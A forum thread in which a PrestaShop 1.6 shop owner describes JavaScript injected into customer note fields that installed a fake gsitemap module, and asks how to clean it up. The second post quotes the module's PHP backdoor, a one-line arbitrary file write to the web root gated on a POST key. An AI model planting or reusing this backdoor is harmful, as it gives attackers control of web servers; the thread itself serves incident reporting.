Strange JavaScript in customers note fields

[ZhabaKwa]

Recently after trying to change status for some orders i started getting PrestaShop errors.

After deeper investigation it appeared that some customers note fields were updated with strange JavaScript. Unfortunately i cant insert full code as forum won't let me.

 

 

After trying to decode variable ff it decodes to base64 ZIP archive with gsitemap module.

 

For now i tried to disable this module and cleared these customers fields directly from DB to take a look will it appear again or not.

Does anybody experienced such an issue with presta? Whats the correct way to fix the things?

 

 

PS: Running version 1.6.1.23. The site is behind CloudFlare.
 

 

 

Edited December 14, 2023 by ZhabaKwa (see edit history)

[ZhabaKwa]

Further investigation showed this was injection of fake gsitemap module with javascript which was successfully installed.

gsitemap-cron.php of injected module contained following backdoor which let it save any file to your servers DOCUMENT_ROOT

/* Check to security tocken */
if(md5($_POST["key"])=='xxxxxxxxx'){file_put_contents($_SERVER['DOCUMENT_ROOT'].base64_decode($_POST['n']),base64_decode($_POST['d']),FILE_APPEND);print_r(md5('999999999999666666633333311111111'));}

 

In my case search for modified files showed nothing was changed though this backdoored module was installed quite long ago. I don't know exactly the way the code was injected but i noticed too much abandoned carts starting from the end of summer. From that time this javascript started to appear in database.